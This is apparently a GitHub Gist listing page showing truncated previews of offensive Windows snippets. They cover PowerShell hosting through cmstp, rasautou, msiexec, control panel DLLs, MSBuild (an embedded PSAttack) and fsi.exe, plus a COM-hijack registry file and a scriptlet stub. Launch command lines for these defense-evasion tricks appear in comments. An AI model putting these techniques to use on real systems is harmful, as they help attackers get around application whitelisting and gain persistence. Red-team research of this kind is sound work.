Skip to content

Instantly share code, notes, and snippets.

View coregen.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
namespace Export
{
class Test
View cmstp.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
View cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
View rasautou.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
// compile using unmanaged exports and referencing system.management.automation
// rasautou -d powershell.dll -p powershell -a a -e e
@NickTyrer
NickTyrer / PSA_MSBUILD64.csproj
Created Nov 18, 2016
PSAttack Using MSBuild Bytestream
View PSA_MSBUILD64.csproj
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
View msiexec.cs
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
View com_hijack.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
@NickTyrer
NickTyrer / fsharp.fsscript
Created Sep 3, 2017
fsi.exe inline execution
View fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()
View powersct.sct
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script